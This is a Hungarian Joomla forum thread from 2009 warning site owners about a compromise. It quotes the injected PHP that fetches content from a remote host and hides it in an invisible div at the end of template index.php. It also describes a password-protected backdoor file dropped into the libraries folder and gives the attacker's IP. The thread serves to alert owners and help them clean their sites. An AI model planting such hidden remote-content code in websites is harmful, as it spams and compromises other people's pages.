Sablon index.php ellenőrzése

Javaslatokat, észrevételeket tedd meg itt!

Sablon index.php ellenőrzése

HozzászólásSzerző: joomlafan » 2009.07.24. 09:57

A következőre szeretném mindenki figyelmét felhívni. Ellenőrizze az aktuális sablon index.php fájlját és a végén keressen egy bejegyzést, ami a következő:

Kód: Egész kijelölése
http://zyzzzqio.is-the-boss.com/mapka.txt


Majd utána következik egy kiírás echo kezdéssel.
Ezt a kettő sort mindenki törölje a sablonjából, ha megtalálhatóak! :!: :!: :!: :!:
Joomla Fan Club
Avatar
joomlafan
 
Hozzászólások: 1479
Csatlakozott: 2008.12.30. 23:56
Adott: 9 köszönetet
Kapott: 360 köszönetet

Re: Sablon index.php ellenőrzése

HozzászólásSzerző: joomlafan » 2009.08.05. 20:43

Meg van a teljes kód, ellenőrizzétek:

Kód: Egész kijelölése
<?php
 $links=@file_get_contents('http://zyzzzqio.is-the-boss.com/mapka.txt');
 echo "<div style=\"height: 0pt;width: 0pt;position: absolute;overflow: auto;\">".$links."</div>";
?>
Joomla Fan Club
Avatar
joomlafan
 
Hozzászólások: 1479
Csatlakozott: 2008.12.30. 23:56
Adott: 9 köszönetet
Kapott: 360 köszönetet

Re: Sablon index.php ellenőrzése

HozzászólásSzerző: joomlafan » 2009.08.06. 07:21

Sikerült azonosítani a támadót. A belépéshez egy fájlt helyez el a:

Kód: Egész kijelölése
http://www.xxxxxxx.hu/libraries/joomla/function.php


néven.
Itt egy jelszót kér. Ha megadják a helyes jelszót, akkor a tárhelyhez teljes hozzáférést szerzet és a fájlokkal, könyvtárakkal azt csinál, amit akar.

Támadás a:
Kód: Egész kijelölése
82.47.211.12


címről érkezik. Ip visszakövetve Nagy-Britanniába visz.

Mindenki ellenőrizze! Főleg úgy, hogy lehet rejtett fájl! :!: :!: :!: :!: :!: :!: :!: :!: :!: :!: :!: :!: :!: :!: :!: :!: :!: :!: :!:
Joomla Fan Club
Avatar
joomlafan
 
Hozzászólások: 1479
Csatlakozott: 2008.12.30. 23:56
Adott: 9 köszönetet
Kapott: 360 köszönetet


Vissza: Javaslatok. észrevételek

Ki van itt

Jelenlévő fórumozók: nincs regisztrált felhasználó valamint 0 vendég